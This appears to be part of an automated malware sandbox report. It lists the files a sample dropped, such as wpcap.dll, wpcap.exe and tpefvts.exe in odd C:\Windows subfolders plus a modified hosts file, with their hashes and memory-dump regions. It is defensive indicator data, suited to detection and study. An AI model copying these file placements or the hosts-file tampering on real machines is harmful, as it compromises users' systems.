fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\cubjtihin\cgeufuill\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\cubjtihin\cgeufuill\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\cubjtihin\cgeufuill\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\cubjtihin\cgeufuill\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
C:\Windows\cubjtihin\cgeufuill\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
C:\Windows\iiyquivu\tpefvts.exe

Filesize
9.4MB

MD5
0d09ec185b9da2803396442f90de0ed7

SHA1
38d6ecb8bb1054f28e6202de57e309fba81e00a3

SHA256
4caf06d94a4b51c78d796c9e38f2d60d371e097f8dbd60dd1416b25921164478

SHA512
1cc1a654ef72b0b5b70d94ec77eebd6bc4f36fc3e5a36e518cf3d80277c3c9cee669ade31a41060c651a9d3402d491227069fe1e365b96560e0683fcd58bc698

Download Submit
C:\Windows\iiyquivu\tpefvts.exe

Filesize
9.4MB

MD5
0d09ec185b9da2803396442f90de0ed7

SHA1
38d6ecb8bb1054f28e6202de57e309fba81e00a3

SHA256
4caf06d94a4b51c78d796c9e38f2d60d371e097f8dbd60dd1416b25921164478

SHA512
1cc1a654ef72b0b5b70d94ec77eebd6bc4f36fc3e5a36e518cf3d80277c3c9cee669ade31a41060c651a9d3402d491227069fe1e365b96560e0683fcd58bc698

Download Submit
C:\Windows\iiyquivu\tpefvts.exe

Filesize
9.4MB

MD5
0d09ec185b9da2803396442f90de0ed7

SHA1
38d6ecb8bb1054f28e6202de57e309fba81e00a3

SHA256
4caf06d94a4b51c78d796c9e38f2d60d371e097f8dbd60dd1416b25921164478

SHA512
1cc1a654ef72b0b5b70d94ec77eebd6bc4f36fc3e5a36e518cf3d80277c3c9cee669ade31a41060c651a9d3402d491227069fe1e365b96560e0683fcd58bc698

Download Submit
C:\Windows\ime\tpefvts.exe

Filesize
9.4MB

MD5
0d09ec185b9da2803396442f90de0ed7

SHA1
38d6ecb8bb1054f28e6202de57e309fba81e00a3

SHA256
4caf06d94a4b51c78d796c9e38f2d60d371e097f8dbd60dd1416b25921164478

SHA512
1cc1a654ef72b0b5b70d94ec77eebd6bc4f36fc3e5a36e518cf3d80277c3c9cee669ade31a41060c651a9d3402d491227069fe1e365b96560e0683fcd58bc698

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
c838e174298c403c2bbdf3cb4bdbb597

SHA1
70eeb7dfad9488f14351415800e67454e2b4b95b

SHA256
1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

SHA512
c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

Download Submit
memory/640-374-0x0000000000FB0000-0x0000000000FC2000-memory.dmp

Filesize
72KB

Download
memory/764-310-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp

Filesize
364KB

Download
memory/1124-345-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp

Filesize
364KB

Download
memory/1164-383-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp

Filesize
364KB

Download
memory/1412-381-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp

Filesize
364KB

Download
memory/1752-328-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp

Filesize
364KB

Download
memory/2200-376-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp

Filesize
364KB

Download
memory/2276-315-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp

Filesize
364KB

Download
memory/2428-267-0x00007FF647A00000-0x00007FF647AEE000-memory.dmp

Filesize
952KB

Download
memory/2428-269-0x00007FF647A00000-0x00007FF647AEE000-memory.dmp

Filesize
952KB

Download
memory/2656-332-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp

Filesize
364KB

Download
memory/2720-363-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp

Filesize
364KB

Download
memory/2796-140-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/2828-336-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp

Filesize
364KB

Download
memory/2868-359-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp

Filesize
364KB

Download
memory/3264-304-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp

Filesize
364KB

Download
memory/3600-379-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp

Filesize
364KB

Download
memory/3620-354-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp

Filesize
364KB

Download
memory/3724-273-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp

Filesize
364KB

Download
memory/3724-276-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp

Filesize
364KB

Download
memory/3956-293-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/4064-341-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp

Filesize
364KB

Download
memory/4468-326-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp

Filesize
1.1MB

Download
memory/4468-308-0x000002290FA60000-0x000002290FA64000-memory.dmp

Filesize
16KB

Download
memory/4468-393-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp

Filesize
1.1MB

Download
memory/4468-390-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp

Filesize
1.1MB

Download
memory/4468-338-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp

Filesize
1.1MB

Download
memory/4468-356-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp

Filesize
1.1MB

Download
memory/4468-280-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp

Filesize
1.1MB

Download
memory/4468-283-0x000002290F1E0000-0x000002290F1F0000-memory.dmp

Filesize
64KB

Download
memory/4468-284-0x000002290FA60000-0x000002290FA64000-memory.dmp

Filesize
16KB

Download
memory/4468-285-0x000002290F620000-0x000002290F624000-memory.dmp

Filesize
16KB

Download
memory/4468-287-0x000002290F400000-0x000002290F404000-memory.dmp

Filesize
16KB

Download
memory/4468-386-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp

Filesize
1.1MB

Download
memory/4468-288-0x000002290F840000-0x000002290F844000-memory.dmp

Filesize
16KB

Download
memory/4468-385-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp

Filesize
1.1MB

Download
memory/4468-377-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp

Filesize
1.1MB

Download
memory/4468-307-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp

Filesize
1.1MB

Download
memory/4468-347-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp

Filesize
1.1MB

Download
memory/4468-312-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp

Filesize
1.1MB

Download
memory/4468-384-0x00007FF6D3470000-0x00007FF6D3590000-memory.dmp

Filesize
1.1MB

Download
memory/4532-133-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/4672-210-0x00000000015F0000-0x000000000163C000-memory.dmp

Filesize
304KB

Download
memory/4884-323-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp

Filesize
364KB

Download
memory/4968-319-0x00007FF7FE100000-0x00007FF7FE15B000-memory.dmp

Filesize
364KB

Download